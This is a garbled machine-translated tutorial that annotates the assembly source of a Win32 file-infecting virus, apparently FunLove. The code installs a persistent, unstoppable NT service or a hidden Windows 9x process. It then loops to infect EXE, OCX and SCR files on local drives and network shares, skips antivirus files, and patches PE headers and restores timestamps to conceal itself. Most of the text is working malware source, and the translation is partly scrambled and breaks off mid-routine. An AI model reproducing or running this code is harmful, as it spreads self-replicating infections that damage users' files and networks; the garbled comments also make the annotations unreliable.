By jackhy / cvc.gb
// When studying Win32 compilation, the annihilated hand tools and stops are written while learning, and the comments are written.
// Thank you for learning your motivation and help, komsbomb, vbin.whg, wowocockl, hume.guojpeng, us ....
// There is my girlfriend, I will always love her.
// My level is very limited, things are definitely not so perfect, I have made my best to do it in detail, because I think
// Many friends who want to get started with me, there is no detailed information, I hope this Dongdong can give friends.
// We are inspired, there are some questions, indicating that I don't understand myself, I know friends, please tell me.
// Small is not grateful ...
// I hope everyone will tell me if you have any questions. This is the biggest encouragement for me.
// Our forum http://bbs.logincom.com/bbs/cgi-bin/leoboard.cgi
// email: jackhy@21cn.com by jackhy /cvc.gb
.386
LargeStack
RADIX 16
Assume CS: Code, DS: Code
Code segment use32
ORG 100
MAIN:
I EQU 1000 - 300
@ EQU EBX - Offset vStart
INCLUDE Header.asm
VStart:
INCLUDE Header.asm
; ------------------------------------------------- ------------------------;
; ----------------------------------------- --------;
; ------------------------------------------------- ------------------------;
Virus Proc Near
Call getVs; call getvs, positioning;
Lea ESI, [Hostcode @]; gets the variable hostcode, preparing for the base address of Kernel;
MOV EDI, [ESP]; obtain the address of the ESP, here is the return address of the program in Kernel32;
Sub EDI, 08
MOV [ESP], EDI
Movsd
Movsd
Push DWORD PTR [ESP 04]; Note this is ESP 04, see later after details;
Call relockernel32; calling Relockernel32, initializing the API address;
OR EAX, EAX; Judging the return value is successful;
JZ short exit; failure jumps;
CMP BYTE PTR [OS @], 00; Judgment the operating system through the flag value;
JNZ Short NT_SRV; if not a flag of 00 (9x), go to the NT module to execute;
Call create9XProcess; call the create9x process and start working 9X;
Ret; return;
NT_SRV: CALL CREATENTSERVICE; calls the NT process. Start doing the processing under NT / 2000;
EXIT: RET; return;
Virus Endp; ----------------------------------------------- --------------------------;
; -------------------- NT Service Creation Routine --------------------;
; ------------------------------------------------- ------------------------;
CreatentsService Proc Pascal Near
Local SCM_Handle: DWORD; Defines a local variable to save the SCM control handle;
Call relocadvapi32; the entrance address of the advanced API
OR EAX, EAX -------- |
JZ Short CNT_FAILED ----- | Error handling;
PUSH 02 ------------------- |
Push 00 |
Push 00 |
Call OpenScManagera ------- | Open Manger's database to allow the creation of services, and return a handle
Save in EAX;
OR EAX, EAX ----------- |
JZ Short CNT_FAILED ----- | Error handling;
MOV SCM_HANDLE, EAX; Success is saved in the variable SCM_HANDLE;
Call createexecutable; calling process created file flcss.exe
OR EAX, EAX ---- |
JZ Short CNT_EXIT ----- | The file exits exits;
MOV EDI, 0F01FF -------------- | What is the specific meaning of this? I don't understand what I don't understand.
Lea ESI, [Service @] |
Push EDI |
Push ESI |
Push SCM_Handle |
Call OpenServicea ------------ | Open the specified service, the function is executed, return to the handle to the FLC service
OR Eax, EAX ---------------- |
JNZ Short CNT_Run ---------- | If you have this service, you will start it;
XOR EAX, EAX ----------------------- |
Push eax |
Push eax |
Push eax |
Push eax |
Push eax |
Lea Eax, [Buffer1 @]; -> Flcss.exe |
Push eax |
Push 01; ErrorControl | Error Control
PUSH 02; START | Automatic start-up mode, this service is adopted;
Push 20; Type | Here is access, I don't know
Push EDI |
Push 00 |
Push ESI |
Push SCM_Handle |
Call CreateServicea ---------------- | Establish service FLC, association process is Flcss.exe
OR EAX, EAX ----------------------- |
JZ Short CNT_FAILED -------------- | Error handling
CNT_RUN:
Push 00 ------------ |
Push 00 |
Push eax |
Call startServicea- | Start service;
OR EAX, EAX ----------- |
Jnz Short CNT_EXIT ---- | Successfully Exited;
CNT_FAILED:
Call startinfectionthread; failed, launch infection threads directly;
CNT_EXIT:
RET
CreateNTService Endp
; ------------------------------------------------- ------------------------;
; -------------------- W9X Process Creation Routine -----------------;
; ------------------------------------------------- ------------------------;
Create9XProcess Proc Near
Call createExecutable; create a flcss.exe file;
OR EAX, EAX ---- | Compare the return value, to exit
JZ Short P9x_exit- |
P9X_00:
XOR Eax, EAX --------- |
Lea Edi, [Buffer2 @] |
Push EDI | Buffer2 initialization;
Push EDI |
MOV ECX, 040 |
REPZ STOSD ------------- |
MOV CL, 06 -------------- | Take 6 times, press the parameters, prepare for CREATEPROCESS
Push eax |
Loop $ - 1 -------------- |
Lea ESI, [Buffer1 @] --- |
Push ESI |
Push 00 |
Call createProcessa ---- | Establishing a process, executing FLCESS.EXE
OR EAX, EAX ------------
Jnz short p9x_exit ---- | Returns
P9x_failed:
Call startinfectionthread; failed, create a thread execution directly in the host process;
P9x_exit:
Ret; return;
Create9XProcess Endp
; ------------------------------------------------- ------------------------;
; --------------------- Flcss.exe Creation Routine --------------------;
; ------------------------------------------------- ------------------------;
Createexecutable Proc Pascal Near
Local C_FileHandle: DWORD, / Define Local Variables C_FileHandle, store file handle;
C_BYTESWRITTEN: DWORD; Define local variables c_bytewritten, store the number of written bytes;
Uses ESI, EDI; Save ESI, EDI value, recovered after this process;
Lea EDI, [Buffer1 @]; obtains the address of buffer1 to store the path;
Push EDI; Save, here is pressing, it can be not pressed when the operation is used.
PUSH 104; the length of the path to be obtained;
Push EDI; Stack, as a parameter of GetSystemDirectory;
Call getSystemDirectorya; call the API to get the path to the system directory. Save in Buffer1
For example: BTFFER1 is "C: / Windows / System" Add Edi, EAX; EAX returns the actual length, so EDI EAX is the last string of the current string.
MOV Al, '/';
Stosb; then add "/ ', constitute a complete path" C: / Windows / system / ";
Lea ESI, [Process @] ----- |
Movsd | Put Flcss.exe after the path after the path is the content of the buffer is
Movsd | C: /Windows/system/flcss.exe
Movsd --------
Push 02; establish a file; (some strange here, less parameters)
Call OpenFile
CMP EAX, -1 ---- | Failure to exit
JZ Short CE_EXIT - |
MOV C_FILEHANDLE, EAX; Save the successful file handle;
Lea EDI, [VIMPORTS 4 @] --- |
MOV EAX, -1 |
Stosd | Cleanter main introduction table
STOSD --------------------- |
Lea edi, [kernel32_relocated @] ---- |
MOV EAX, [EDI - 8] | Clean the second introduction table;
STOSD --------------------- |
Push 00 ----------- | Write the file header, write the head of the PE file to the newly established | file;
Lea ESI, C_BYTESWRITTEN |
Push ESI | Note: EBX is the address that starts writing, in the program, because it is the base address processing of the positioning
Everyone is watching | Look at the VStart:
| Incline header.asm
| Because the program contains Header.asm, here is actually | pointing to Header.asm's start position, that is, the file header
So use EBX
PUSH 0200 |
Push EBX |
Push c_filehandle |
Call writefile ----------------
Push 00 -------------------- |
Push ESI | Write to the virion, write the virus body included in the file | into the file
Push phys_vsize |
Push EBX |
Push c_filehandle |
Call writefile ------------------
Push c_filehandle -------------- | Close file
Call CloseHandle --------------- |
CE_EXIT:
Inc EAX; EAX plus 1, as a judgment of success;
Ret; return;
Createexecutable Endp
; ------------------------------------------------- ------------------------;
; --------------------------- ViRal Service -------------------- -------;
; ------------------------------------------------- ------------------------;
This is the program section that is running after the virus is written, and the same is not limited;
Call getvs; positioning;
Push DWORD PTR [ESP] --- | Call relockernel32 ----- | Get an API entry address
OR EAX, EAX ----------- |
JZ vs_exit ----------- | Failed to exit;
CMP Byte Ptr [OS @], 00 ------------
JZ Short W9x_Service_register - Comparison Start Judgment The generated OS flag value, get the flag of the OS
If it is NT, it will be performed in order;
Wnt_Service_Hacknowledge: // NT module processing, here is //
Call relocadvapi32; dynamic search advanced API's entry address;
OR EAX, EAX ------- |
JZ vs_exit ------- | Failed to exit this process;
Lea ESI, [Buffer1 @]
XOR EAX, EAX
Lea ECX, [Service @]; obtain the service name, prepare for the back registration service function;
Lea edx, [servicedispatcher @]; obtain the valid address of the process as the service handler running;
MOV [ESI], ECX --------- |
MOV [ESI 04], EDX |
MOV [ESI 08], EAX |
MOV [ESI 0C], EAX |
|
PUSH ESI --------------- | Construct parameters in Buffer1, stack,
Call startservicectrldispatchera; establish a service process main thread is ServiceDispatcher and service control tube
The connection of the instrument, my understanding is to make a registration in the data structure of the system service;
W9X_Service_Register :: // 9X module processing, here is //
Lea ESI, [USER32_NAME @] ----- |
Push ESI |
Call loadLibrarya ------------ | Loading the USER32.DLL library
Lea ESI, [RegisterClassa 7 @] ---- |
Push ESI |
Push eax |
Call getProcaddress ---------------- | Get the entrance address of the API of the registerclass;
OR Eax, EAX ------------------ |
JZ Short vs_00 -------------- | Failure directly starts infection thread;
MOV [ESI - 06], EAX; Success Successfully saved its entry address;
Lea ESI, [Buffer1 @] ----------
MOV EDI, ESI |
XOR EAX, EAX |
MOV ECX, 0A |
REPZ STOSD ----------------- | Initialization buffer as the parameter of the following registercalssapi
MOV DWORD PTR [ESI 04], - 1 --------- | Register a form class, name is FLC;
MOV DWORD PTR [ESI 10], 400000 |
Lea Eax, [Service @] |
MOV [ESI 24], EAX |
|
Push ESI |
Call RegisterClassa --------------------
Lea ESI, [RegisterServiceProcess 7 @] --- |
Push ESI |
Push DWORD PTR [kernel32_base @] |
Call getProcaddress ----------------------- | Entrance address of RegisterServiceProcess
Kernel32 memory map space
OR EAX, EAX --------------------
JZ Short vs_00 ---------------- | Failure, directly start the infection process;
MOV [ESI - 06], EAX; save its entry address;
Call getCurrentProcessId; obtain the unique ID of the current process as the parameters of the following API;
Push 01 --------- |
Push eax |
Call RegisterServiceProcess ------ | Registering the current process for system services, making the program
Ctrl del alt disappears
PUSH 8 * 1000D ------------ |
Call Sleep --------------- | Sleep 8 seconds;
VS_00:
Call startInfectionthread; start the infection process;
Vs_exit:
RET
Vservice Endp
; ------------------------------------------------- ------------------------;
; ----------------------- NT Service Dispatcher ----------------------- ;
; ------------------------------------------------- ------------------------;
Servicedispatcher Proc Pascal Near
Local service_handle: dword; define local variables to save service handles;
Call getvs; positioning; (can you not do?);
Lea ESI, [ServiceHandler @] ----------
Lea Edi, [Service @] |
Push ESI |
Push EDI |
Call RegisterServiceCtrlHandlera ----- | Returns a handle for control service
Mov service_handle, EAX; saved in the service_handle variable;
Lea ESI, [Buffer1 @] ------ |
MOV EDI, ESI |
MOV ECX, 06 |
XOR EAX, EAX |
REPZ STOSD ---------------- | Initialization buffer buffer1, all 0
MOV DWORD PTR [ESI], 10 ----------
MOV DWORD PTR [ESI 04], 04 |
MOV DWORD PTR [ESI 08], 07 ----- | Initialization parameters;
Push ESI ---------------- |
Push service_handle |
Call setServiceStatus ------------ | Initialize the current state and tell the WIN system, come on, I am ready
Yes, my current information has already told you.
PUSH 8 * 1000D ----- |
Call Sleep ------- | Sleep 8 seconds (why? Sleep !!!?);
Call startinfectionthread; start infection sub-thread; RET
Servicedispatcher Endp
; ------------------------------------------------- ------------------------;
; ------------------------------------------- -----;
; ------------------------------------------------- ------------------------;
ServiceHandler Proc Near
Ret; if the admin Tries to halt the
Service, He'll Get a System Error
ServiceHandler Endp
; ------------------------------------------------- ------------------------;
; ------------------- Thread Creation Routine ------------------;
; ------------------------------------------------- ------------------------;
StartInfectionthread Proc Pascal Near
Local threadid: DWORD; Defines local variables threadID to save the thread handle;
Call gettickcount; achieve random value;
MOV [Rand @], EAX; the resulting value is saved to the variable Band;
Lea Eax, ThreadID ----------
Push eax |
Push 0 |
Push 0 |
Lea Eax, [vthread @] | Represents the address of the function where the new thread starts executing the time code, that is, a thread letter |
Push eax |
Push 0 |
Push 0 | Note 0 here, indicating that it is immediate
Call CreateThread -------- | Establish a new thread
RET
StartInfectionthRead Endp
; ------------------------------------------------- ------------------------;
; --------------------------- ViRed THREAD ------------------- --------;
; ------------------------------------------------- ------------------------;
VThread Proc Near
Call getvs; positioning;
Call infectdrives; infected driver module;
PUSH 60D * 1000D --- |
Call Sleep ------ | Sleep (I want to sleep, continue)
Call getrand --------- |
And Al, 1F |
Jnz short vthread --- infected local files at a certain probability;
Call InfectNetWork; starting network infection;
JMP short vthread; jump to VTHREAD, continue to execute, this is a dead loop;
VTHREAD ENDP
; ------------------------------------------------- ---------------------------------------------------------------------------------------------- NetWork Infection Routine ---------------------;
; ------------------------------------------------- ------------------------;
InfectNetwork Proc Near
Lea Eax, [MPR_NAME @] ----------
Push eax |
Call loadLibrarya ------------ | Load the MPR.dll library file;
OR Eax, EAX --------------- |
JZ Short inet_failed ------- | Failure jump;
Push EAX --------------------- |
Lea ESI, [MPR_FUNCTIONS @] |
Push ESI |
Call DLL_RELOCATE ------------ | Search to get the address of the relevant API in mpr.dll;
OR EAX, EAX ----------------- |
JZ Short inet_failed ------- | Failure jump;
Push 00 ---------------------- |
Call NetSearch --------------- | Start search sharing;
INET_FAILED:
RET
InfectNetwork Endp
; ------------------------------------------------- ------------------------;
; ---------------------- Valid Drive Test Routine ---------------------;
; ------------------------------------------------- ------------------------;
InfectDrives Proc Near
PUSH ESI
Call gettickcount - | Get the current time saved as a random value
MOV [Tick @], EAX --- |
Lea ESI, [Buffer1 @]; obtain the address of buffer1, then initialize, content is
MOV DWORD PTR [ESI], '/: @'; @: /, note, @ @ @ 为 的 Previous character
It means that it begins here;
ID_TESTDRIVE:
MOV BYTE PTR [ESI 03], 00 - | Add 0, constructive parameters to the string
Push ESI |
Call getDriveTypea ---------- | Judging the type of drive;
CMP Al, 03 ----------- | Determine if it is an unmovable drive (such as a hard disk)
JZ short id_driveok -------- | Yes start infection
CMP Al, 04 --------- | Judgment whether or not a mapped network disk
Jnz short ID_INVALID -------- | Don't do error handling; prove that this disk is useless;
ID_DRIVEOK:
Add ESI, 03; ESI plus 3, pay attention to it already points to the shape, such as "x: /";
Push ESI ------- |
Call blownaway ---- | Give NT patch;
Push ESI ----- | Search File; Call FileSearch --- |
SUB ESI, 03; Back to Buffer1, prepare for the next operation;
ID_INVALID:
MOV Al, [Buffer1 @] --------- |
INC Al |
MOV [buffer1 @], al |
|
CMP AL, 'Z' |
JNA Short ID_TESTDRIVE ----- | Loop acquire 26 disks
POP ESI
RET
InfectDrives Endp
; ------------------------------------------------- ------------------------;
; ---------------- Recursive Computer Search Routine ----------------;
; ------------------------------------------------- ------------------------;
NetSearch Proc Pascal Near
Arg WnetStructAddr: DWORD; Defines a pointer to the network data structure;
Local EnumBufferaddr: DWORD, /; Define a variable to save the address of the network cache;
Enumbuffersize: DWORD, /; Define the size of the network cache, now no value
Enumnb_Objects: DWORD; Define a variable after saving the enumeration mechanism to save the number of enumerations;
Uses ESI, EDI
Mov Enumbuffersize, 4000; Initialization Network Cache Size is 4000;
OR enumnb_objects, -1; initialization enumeration variable is ffff, here is expressed as all shared resources
Lea Eax, WNetStructAddr ------ |
Push eax |
Push WnetStructAddr |
Push 0 |
Push 0 |
Push 2 |
Call WNETOpenENUMA ----------- | Start a enumeration process, generate a handle;
OR EAX, EAX ----------------- |
JNZ NET_CLOSE --------------- | Failed, turn off the network connection;
PUSH 04 ------------ |
Push 1000 |
Push 4000 |
Push 00 |
Call Virtualall ----------- | Assign a readable write-writable memory
OR EAX, EAX ----------------- |
JZ Short Net_Close --------- | Failed, turn off the network connection;
MOV Enumbufferaddr, EAX; the address value of the assigned virtual memory to the network cache address variable,
Prepare for the following processing;
NET_00:
MOV ESI, ENUMBUFFERADDR ----------
|
Lea Eax, Enumbuffersize |
Push eax |
Push ESI |
Lea Eax, Enumnb_Objects |
Push eax |
Push WnetStructAddr |
Call WneetenumResourcea --------- | Start enumeration sharing;
OR EAX, EAX ----------------- |
JNZ short net_free ---------- | Failed, release virtual memory space;
MOV ECX, Enumnb_Objects; Number of Resources for Real Enumerations
OR ECX, ECX; ---------------- | JZ Short Net_00 ------------- | Compare if there are sharing, no to find (here I have a question
If there is no resource, isn't it going to die? )
NET_01:
PUSH ECX; Save the number of resources
PUSH ESI; save the address of the network cache;
MOV ESI, [ESI 14]; get the network name of resources, shaped like // xxx / x
OR ESI, ESI; Is it empty?
JZ Short Net_03; Yes, strange, empty can you? :)
CMP Word PTR [ESI], 0041; Is it a floppy drive?
JZ Short Net_03; Yes, then jump (here I have a problem, it seems that it is the name of shared resources.
The word is judged. If I give a shared name for a folder? What will it? )
Lea EDI, [Buffer1 @]; all do not prepare the string;
NET_02:
Movsb ----------------- |
CMP Byte PTR [ESI], 00 |
JNZ Short Net_02 |
|
MOV Al, '/' |
STOSB ----------------------- | Structure into // xxx / x / string;
Push EDI ----------------------
Call Blownaway ----------------- | NT patch file, this is a remote patch;
Push EDI --------------------
Call filesearch ---------------- | Call the file search process, start searching and infection;
NET_03:
POP ESI ----------------------- |
|
MOV EAX, [ESI 0C] |
And Al, 2 |
CMP AL, 2 |
JNZ short net_04 -------------- | Is there any other enumeration that is included by the current resource
Additional resources
Push ESI ---------------------- |
Call NetSearch ----------------- | If any, as a parameter is a search, here is actually understanding
Mean
NET_04:
Add ESI, 20 --------------------
POP ECX |
LOOP NET_01 -------------------- | Found, ESI continues to find a sharing;
JMP Short Net_00; once again start enumeration network resources
NET_FREE:
Push 8000 --------------------- |
Push 00 |
Push enumbufferaddr |
Call VirtualFree -------------- | Release the virtual memory space, why is this 8000?
NET_CLOSE:
Push WnetStructAddr ----------- |
Call WnetCloseenum ------------ | End the enumeration operation;
RET
NetSearch Endp
; ------------------------------------------------- ------------------------ ;; ------------------ Recursive File search Routine - ------------------;
; ------------------------------------------------- ------------------------;
FileSearch Proc Pascal Near
Arg CurrentDirend: DWORD gets the first address of the current directory string from the stack;
Local SearchHandle: DWORD Defines a local variable to save the file handle after search;
Uses ESI, EDI
Mov Eax, CurrentDirend; EAX Save the first address of the current directory string;
MOV DWORD PTR [EAX], 002A2E2A; add *. * Now in the current location
x: /*.*
Lea edi, [buffer2 @] -------- |
Lea ESI, [Buffer1 @] |
Push EDI |
Push ESI |
Call FindfirstFilea --------- | Look for files, put the result in Buffer2;
CMP EAX, -1 ----------------- |
JZ Short RS_EXIT ---------- | Unsuccessful, let's go;
RS_00:
Mov searchhandle, Eax; Save the found handle;
RS_01:
TEST BYTE PTR [EDI], 10 ------ |
JZ Short FileTest --------- | Judging is a file or directory, pay attention to "."
"..", if it is a file, it is a directory, continue to deepen, a layer of extension;
RS_DIRECTORY:
CMP BYTE PTR [EDI 2C], '.' --- | If it is a current directory, start looking;
JZ Short Rs_Next ------------- |
Mov ESI, EDI ------------------- |
Add ESI, 2C -------------------- | Take the directory name, here is other directory names outside the directory
MOV EDI, CURRENTDIREND; back to the string is prepared for the back constructed string;
RSD_00:
Movsb ----------
CMP Byte Ptr [ESI], 0 |
JNZ Short RSD_00 ---------- | Structure shape such as x: / x string
MOV Al, '/' ---------------- | Add "/", buffer1
Stosb ------------- | Shape as x: / x /
Push EDI ----------
Call filesearch -------- | In a search, at this time, the current directory name has also become (if you use it
Regeneration? )
RS_NEXT:
Lea edi, [buffer2 @] ------- |
Push EDI |
Push searchhandle |
Call FindNextFilea --------- | Continue to find the next directory
OR Eax, EAX --------------- |
JNZ Short RS_01 | There is no thing, indicating that there is no file or directory in this directory.
So turn off, if you continue to find; push searchhandle |
Call FindClose ------------- |
RS_EXIT:
RET
Filetest:
MOV EDX, [EDI 2C] ----------
OR EDX, 20202020 | Extension of the file
XOR EDX, 61F81F61 ---------- | Upper write lowercase, then turn back from the non-letter, such as "."
Lea ESI, [SKIPNAMES @] ----------------------
MOV ECX, 0C; 12 times, because there are 12 file names after the back |
|
FT_00: |
Lodsd |
CMP EDX, EAX; compares whether it is the beginning character of anti-virus software; |
JZ short ft_exit; if you go to find the next; |
|
LOOP FT_00 ---------------------------------- | Find whether it is the file name of anti-virus software;
Mov ESI, EDI --------------------------------------------------------------------------------------------------------------------------------------------
Add ESI, 2C |
|
FT_01: |
Lodsb |
OR Al, Al |
JNZ Short FT_01 |
|
MOV EAX, [ESI - 4] |
OR Eax, 20202020 --------------------- | If it is not an anti-virus file, the extension taken begins to compare
CMP EAX, 'XCO' ----------------------
JZ Short FT_02 |
|
CMP EAX, 'RCS' |
JZ Short FT_02 |
|
CMP EAX, 'EXE' |
Jnz short ft_exit ------------------- | Comparison is the type of file we want to infect;
FT_02:
MOV EAX, [EDI 20] --------------- |
CMP EAX, 2000 |
JC short ft_exit ---------------- | Compare the file size can be worthy of infection, not less than 2K
CMP Al, 03 ------------------ |
JZ short ft_exit ------------ | This is a file that is judging whether it is infected, it is exiting infection.
Lea ESI, [Buffer1 @] ----------- |
Lea Edi, [Buffer3 @] |
Push EDI |
|
MOV ECX, CurrentDirend ~~~~~~~~~ | Calculate the length of the current string
Sub ECX, ESI ~~~~~~~~~~~~~~~
REPZ MOVSB --------------------- | Here is the directory path, for the following infection construct string
LEA ESI, [Buffer2 @] ----------- |
Add ESI, 2C |
|
Ft_03: |
Movsb |
CMP BYTE PTR [ESI - 1], 0 |
JNZ Short FT_03 --------------- | Get the file name, to this, a string of a absolute path constructs a function
Call infectfile starts infection
Ft_exit:
JMP RS_Next
FILESEARCH ENDP
; ------------------------------------------------- ------------------------;
; ----------------------- File Infection Routine ----------------------;
; ------------------------------------------------- ------------------------; Infectfile Proc Pascal Near
Arg i_filename: DWORD; get the file name from the stack;
Local i_fileHandle: DWORD, / Define local variables for saving file handles;
i_filesize: DWORD, / Define local variables for saving file size;
i_BytesRead: DWORD, / Define local variables, used to save the actual read and write byte number of files
i_virusoffset: DWORD, / Define local variables for saving the offset address of the virus;
i_maphandle: DWORD, / Define local variables to save the handle of the memory mapping file;
i_hostdep32: dword, / define local variables for saving
i_ep_offset: DWORD Defines a local variable for saving
Uses ESI, EDI; Save ESI, EDI value, automatic recovery after the end of this process;
Push i_filename --------- |
Push 03 |
Call OpenFile ----------- | Open the file to open the presence file;
CMP EAX, -1 ------------- |
JZ IN_EXIT ----------------------------------------------------------------------------------------------------
Mov i_filehandle, eax; success, save file handle;
Push 00 ------------------
Push eax |
Call getFileSize --------- | Get the size of the file;
Mov i_filesize, eax; saved in the variable i_filesize;
CMP AL, 03 --------------- |
JZ IN_EXIT -------------- | Judging whether the file has been infected, if yes, skip;
Lea EDI, [Buffer3 @]; obtain the effective address of buffer3;
Push 00 ----------
Lea ESI, I_BYTESREAD |
Push ESI |
Push 2000 |
Push EDI |
Push i_filehandle |
Call readfile -------------- | Read 4096 bytes in Buffer3;
CMP Word PTR [EDI], 5A4DH --- | The comparison begins not in line with file, trap processing;
JNZ in_closefile ----------- | It is not the format that can be executed.
CMP Word PTR [EDI 18], 0040 --- |
JNZ in_closefile --------------- | Isn't a win file, here> = 40HW is Win file, It is also skipping; CMP DWORD PTR [EDI 3C], 1C00 - | Ja in_closefile --------------- | Compare the DOS head is 3C, it means that it has been infected Add EDI, [EDI 3C]; Save the value at 3CH; MOV EAX, [EDI] ------------ CMP Eax, 00004550 | JNZ in_closefile ------- | Comparison is the PE file, not, close the skip; CMP Word PTR [EDI 5C], 2 --------- | JNZ IN_CLOSEFILE ------------------- | Comparison is the file of the subsystem of the GUI, is not skipping Mov ESI, EDI ---------------- | Add ESI, 18 | Add Si, [EDI 14] | Push ESI ----------------- | Get the value of the first section; MOV EAX, [EDI 28]; the RAV of the current execution section is acquired, generally defaults to 1000; IN_00: MOV ECX, [ESI 0C] --- | Add ECX, [ESI 08] --- The end address of the first section in memory; CMP EAX, ECX; if the EAX is less than ECX, whether the RAV is less than the current address, if it is less than jumps to IN_01, if it is greater than to continue, I have a problem here, but now I understand: JC Short In_01 Add Esi, 28 -------- | JMP Short In_00 --- | Pointer plus 28, pointing to the next section; IN_01: Sub eax, [ESI 0C] ------ | Add Eax, [ESI 14] | MOV i_ep_offset, EAX ----- | Getting the section of the file in the file; OR [ESI 24], 80000000; Changing this section of the properties, change it to write; (here is the properties of the modified EP section why? ? ) POP ESI; refreshing an ESI's value, here returning to the first section head, note that it is above The impact of the ADD ESI, 28 after operation XOR ECX, ECX; Qing Di 0ecx; MOV CX, [EDI 06]; Number of getting the section; Dec ECX; minus one ------ | MOV EAX, ECX | Mov EDX, 28 | Mul EDX | Add ESI, EAX ---------- | Get the location of the last section; Mov Eax, [ESI 24] --------- | CMP AL, 80 | JZ in_closefile ---------- "Is it initialized, if you turn the file (is it to be infected? ); OR EAX, 8C000000 ----------- | And Eax, Not 12000000 | MOV [ESI 24], EAX ----------- | Replace it to write, not shared, can not be deleted; MOV ECX, I_FILESIZE ---------- MOV EDX, ECX | MOV EAX, ECX | CLC | SHR EAX, 03 | Sub EDX, EAX | Sub EDX, [ESI 14] | JC Short IN_02 ----------- | Judgment is a self-extracting file; if it is less than, it is considered SFX, infection SUB EDX, [ESI 10]? ? ? ? ? ? ? ? ? ? ? ? ? JNC IN_Closefile IN_02: MOV EDX, [ESI 08]; get the virtual size of the file; SUB ECX, [ESI 14]; get the actual start address of the last section; JC Short IN_03; if less than? That is to say, the current actual file length is small than the last section? CMP EDX, ECX; minus the actual length with virtual size? Crazy, how can it be small? JA Short In_03; if the purpose is not achieved MOV EDX, ECX; put the current address to EDX; IN_03: TEST EDX, 00000FFF; Align on 1000h JZ Short IN_04 And EDX, 0FFFFF000 Add EDX, 1000 IN_04: MOV ECX, EDX ------------ | Add ECX, [ESI 0C] | MOV EAX, ECX | Add eax, Virt_vsize | MOV [EDI 50], EAX ----- | Previous virtual size plus the current size, then update SizeOfImage Sub ECX, [EDI 28] ---------------- | Add ECX, Offset VStart - 100 - 08 | MOV i_hostdep32, ECX --------------- | RAV Mov Eax, EDX ----------------------- | Add eax, Virt_vsize | MOV [ESI 08], EAX ---------------- | Increase the virtual size; MOV EAX, EDX Add Eax, [ESI 14] Mov i_virusoffset, EAX Add Edx, Phys_Vsize ---------------- | MOV [ESI 10], EDX | Add Edx, [ESI 14] | Add Edx, 03 ------------------------ | Add physical dimensions Push i_filehandle -------- | Push Edx | Call mapfile ------------- | Establish a memory mapping file; OR Eax, EAX -------------- | JZ short in_closefile --- | Failure exits; MOV I_MAPHANDLE, EAX; save the handle; Push EAX ---------- Call ViewMap ---- | Mapping file objects to this process space; OR Eax, EAX -------------- | JZ Short In_Closemap ---- | Error turns off the memory mapping file; MOV EDX, EAX; save the file in memory mapping; Lea ESI, [Buffer3 @] -------- | MOV EDI, EDX | MOV ECX, 2000 | REPZ MOVSB ------------------ | Write the PE header; Lea Edi, [Hostcode @] -------- MOV ESI, I_EP_OFFSET | Add ESI, EDX --------------- | Get the address of the EP in the new memory space; Movsd Movsd MOV EDI, ESI; SET UP CALL GS: Virus Sub EDI, 08 Mov eax, 00e8659090 Stosd Mov eax, i_hostdep32 Stosd MOV EDI, EDX; EDI is now stored in memory in memory; MOV EAX, I_FILESIZE; EAX stores the size of the file; MOV ECX, I_VIRUSOFFSET; ECX stores the virus code based on the file-based offset address; Sub ECX, EAX; minus the size of the file with the deviation of the virus; JNA Short In_05; if you are bigger than file, go to IN-05 Add Edi, Eax; now EDI moves to the end of the file. XOR Al, Al; Al clear 0; REPZ Stosb; starts with CX to initialize the space behind the number; IN_05: MOV ESI, EBX; source string address is our start address; ------ | MOV EDI, EDX; EDI is a mapping location in memory; | Add edi, i_virusoffset; positioned to virus based on file-based address; MOV ECX, VSIZE; Times of cycles; | REPZ MOVSB; copy; ---------------------------------- | Write viral body; MOV ECX, Phys_Vsize - vsize 3 ---- | REPZ Stosb ------------------------- |? ? ? ? ? ? Push EDX; Pass the location of the value of EDX to unmapViewoffile Call unmapViewoffile; Unpacking the file object in the current address space; IN_Closemap: Push i_maphandle ----- | Call CloseHandle ----- | Close the file object; Call wait_a_little; sleep function; IN_Closefile: Lea ESI, [Buffer2 14 @] --- | Push ESI | SUB ESI, 08 | Push ESI | SUB ESI, 08 | Push ESI | Push i_filehandle | Call setFiletime ------------ | Recover the time; Push i_filehandle --- | Call CloseHandle ---- | Close the file; IN_EXIT: Ret; return; Infectfile Endp ; ------------------------------------------------- ------------------------; ; ----------------- GetProcaddress search routine ------------------ ; ------------------------------------------------- ------------------------; Whereis_GPa Proc Pascal Near Arg W_kernel32: DWORD; to the value passed through the stack, the return address inside the kernel32; Uses ESI, EDI; Save the value of this 2 registers first, automatically recover after the process is executed; Lea ESI, [GPA_SIGS @]; the first address of the characteristic string of judging the operating system; MOV BYTE PTR [OS @], 00; Variable OS initial 0, its role is that the execution after the program can directly pass its value to determine the operating system, MOV EAX, W_KERNEL32; give the address and operation, get it higher 3, for easy understanding, I am so And Eax, 0FFF00000; title; CMP EAX, 0BFF00000; Comparative Time is 9X address characteristics; JNZ Short OS_WINNT?; not to the NT to judge; OS_WIN9X: Mov EDI, 0BFF70000; the fixed kernel32 is enacted to EDI in the value of 9X, here is the 4 complement JMP Short WG_00; then jump to WG_00 to execute; please pay attention to the OS here no 1 OS_WINNT ?: INC BYTE PTR [OS @]; OS 1, the later program uses this as a judgment of the NT system; Add ESI, 08; ESI plus 8, pointing to NT4 in GPA_SIGS; CMP EAX, 077F00000; Continue to compare whether it is NT system; JNZ Short OS_WIN2K?; No, it will judge the paragraph of 2K; Mov EDI, EAX; is, save, then go to WG_00 to execute, please pay attention, here funlove JMP Short WG_00; the base address of NT is considered 077f00000; it is actually 4, but there is 0, There is no re-assay here. OS_WIN2K ?: INC BYTE PTR [OS @]; OS 1, the later program uses this as a decision of the 2000 system; Add ESI, 08; ESI plus 8, pointing to 2K in GPA_SIGA; CMP EAX, 077E00000; Compare whether it is the address of the 2000 kernel32; Jnz short wg_failed; is not, it means that it is not a needed operating system, it failed to jump; Pay attention to the failure here, because the version of the operating system Or the problem of patch, will also appear. MOV EDI, 077E80000; did not fail, it is 2K, the base address inside 2K; WG_00: MOV EDX, EDI; EDX Save the base address obtained above after judgment; MOV ECX, 2000; Circulation 20000, starting violent search for the address of getProcessAddress; WG_01: PUSH ECX; saved ECX value; MOV ECX, 08; --- ECX assignment 8, putting the prefix string in the current ESI Push ESI | Passing to EDI. Push EDI | REPZ CMPSB; ------ POP EDI; EDI recovery value, prepare for the next lookup; POP ESI; ESI recovery value, prepare for the next lookup; POP ECX; Restore ECX value, 2000 JZ Short WG_02; If equally, go to WG_02 to execute, find the address of getProcaddress, inexue; Loop wg_01; Continue to find until it is found; note that the way to use the feature string judgment So don't have to care about the instructions inside Kernel32, one is more comparison. BTW: This method is not very good, you can use WHG method, W_failed: XOR EAX, EAX; error handling, exit 